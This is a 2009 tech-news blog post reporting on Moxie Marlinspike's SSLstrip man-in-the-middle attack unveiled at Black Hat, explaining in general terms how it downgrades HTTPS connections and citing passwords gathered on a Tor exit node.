Hacker creates SSLstrip package

February 20, 2009 // 1:49 p.m.

Tags: #black-hat #encryption #hack #hacker #moxie-marlinspike #rsa #secure-sockets-layer #ssl #sslstrip #tor

If you think that your connection to websites is secure, new research might give you cause to think otherwise.

According to an article on The Register, hacker Moxie Marlinspike – an alias, obviously – has used this week's Black Hat security conference to unveil a new attack against Secure Socket Layer connections to web sites.

Dubbed “SSLstrip,” the attack is a novel form of man-in-the-middle attack which can be carried out on publicly-accessible WiFi networks, onion-routing networks like Tor, and local area networks that share a single connection point to the Internet. Designed to sit in-between a client and a server, the package tricks the user into believing that a secure connection to a website has been opened – while actually transmitting information including user names, passwords, and credit card details via plain-text.

According to Marlinspike's presentation, the attack works because of measures put in place to speed up web servers: because SSL puts a strain on the server hardware, taking far longer to serve than an unencrypted connection, most websites serve content on an unencrypted link and only switch to SSL encryption when private information is being transmitted in either direction.

By modifying the secure links to point to HTTP – port 80 – rather than HTTPS – port 443 – the SSLstrip tool forces the web browser to transmit information in plain-text format, without encryption. The website, however, labours under the assumption that the connection is still fully encrypted and secure, and so an error message is never generated.

Where the tool gets clever is in the use of a proxy server which is signed with a valid SSL certificate. When this mode is activated, the connection between the web browser and the SSLstrip server is secured with valid credentials – which means that built-in protections in the browser against this sort of man-in-the-middle attack are never triggered, and the user continues to see that oh-so-reassuring padlock symbol and a “https://” address.

The attack – which has been tested against both Firefox and Safari – isn't a mere proof of concept, either: Marlinspike has successfully run the package on a Tor exit node, gathering 254 passwords for supposedly-secure sites including GMail, TicketMaster, and PayPal over the course of a single day.

So far, there is no real solution to the problem of SSL man-in-the-middle attacks – aside from, as Marlinspike himself states, to “encrypt everything” – something that will require webhosts to invest in significantly more powerful hardware.

Does the knowledge that a simple tool for sniffing your SSL-protected details exists give you cause for alarm, or is the likelyhood of someone being in a position to run a man-in-the-middle attack so low that the SSLstrip package is nothing more than an interesting toy? Share your thoughts over in the forums.

QUICK COMMENT

View this in the forums

SUBSCRIBE TO OUR NEWSLETTER

WEEK IN REVIEW

TOP STORIES

SUGGESTED FOR YOU